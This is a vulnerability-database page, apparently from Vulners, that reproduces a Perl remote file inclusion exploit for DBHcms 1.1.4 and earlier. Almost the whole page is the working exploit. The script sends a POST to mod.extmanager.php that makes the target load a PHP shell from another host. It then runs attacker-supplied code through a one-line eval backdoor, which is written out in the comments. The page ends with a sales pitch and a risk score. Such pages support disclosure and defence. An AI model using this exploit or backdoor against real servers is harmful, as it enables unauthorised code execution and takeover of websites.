Lucene search
dbhcms-rfi.txt
DBHcms <= 1.1.4 Remote File Inclusion exploit Vendor url: www.drbenhur.com. Exploit hard to execute through a browser with POST. Shell: <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>. Example target url: http://www.target.com/dhbcms/
Show more
`#!/usr/bin/perl
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# Vendor url: www.drbenhur.com
#
# exploit is hard to execute through a browser -possible though- since it's with POST
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
#Shell:
# <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>
$shell_url = "http://localhost/s.txt";
print "#
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/dhbcms/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "dbhcms/mod/mod.extmanager.php?do=".$code;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->post($target,
{
'extmanager_install' => $shell_url.'?'
});
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
if($response->content =~ /URL file-access/)
{
print 'Exploit failed';
}
else
{
print $response->content;
}
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo26 Feb 2008 00:00Current
7.4High risk
Vulners AI Score7.4